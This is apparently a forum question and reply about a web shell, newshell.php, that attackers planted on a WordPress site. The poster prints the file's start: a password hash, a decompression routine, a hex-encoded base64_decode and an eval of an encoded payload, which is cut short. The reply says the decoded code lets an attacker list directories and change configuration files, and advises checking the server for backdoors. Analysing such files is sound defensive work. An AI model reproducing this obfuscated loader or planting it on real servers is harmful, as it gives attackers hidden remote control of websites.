They inserted a malicious file through wordpress, I already removed the permissions to that wordpress, I also saw that nothing else was infected, however I would like to know what this file does.
File name: newshell.php
<?php
$PASS="c279fa156e660bbb90ba27e1c69605d6";
function T_($Bc) {
$x2 = 256;
$W2 = 8;
$cY = array();
$I3 = 0;
$C4 = 0;
for ($bs = 0; $bs < strlen($Bc); $bs++) {
$I3 = ($I3 << 8) + ord($Bc[$bs]);
$C4 += 8;
if ($C4 >= $W2) {
$C4 -= $W2;
$cY[] = $I3 >> $C4;
$I3 &= (1 << $C4) - 1;
$x2++;
if ($x2 >> $W2) {
$W2++;
}
}
}
$K5 = range("\x0", "\377");
$UH = '';
foreach ($cY as $bs => $xd) {
if (!isset($K5[$xd])) {
$iU = $Co . $Co[0];
} else {
$iU = $K5[$xd];
}
$UH .= $iU;
if ($bs) {
$K5[] = $Co . $iU[0];
}
$Co = $iU;
}
return $UH;
}
$_DMIE8x="\x62\x61\x73\x65\x36\64\137\144\x65\x63\x6f\x64\x65";
eval(T_($_DMIE8x("aTMKBCaTmczKdBQJCgQSmUxSKT2IIVDCmIB6IBEYjEZhsMhgZBoYjCNBsZhqOByNzINjGYhyZhmM
xkYjGNhgOBwIh2ID7EnElkxFhAdDkdTLOxJP05QhOVSoRhaOBPSJ+mqYRjSbDKcyaYTdU58lkzQj
aZBrCS+UyKUitay2JyQVCoUC+VbUUi+QSORScVBOXRTO4AIIFBINCBIXyGTyeSySRS3ZbPibvbSl
b7jcy+SCeU79gBcIjWZTyIsAKRBETgcjedNaeTgZRRkrRlbdcLldM5nr+KdDo9KLLCmcDPBBABQZ
The code follows, but it's the same as this, like a super encrypted password.
An internet search for part of the file's content yields this address:
https://medium.com/@ostapkorkuna/fighting-a-russian-hacker-a-story-of-one-infected-wordpress-website-5ca0318f7a7a
What goes there, I suppose, is a compressed base 64 content. When decompressing it and passing it through eval, it returns the understandable code, which allows you to try everything you can through php: list directories, intervene in configuration files, etc.
There is a possibility that you have left a backdoor, it is worth doing a diagnosis of the server.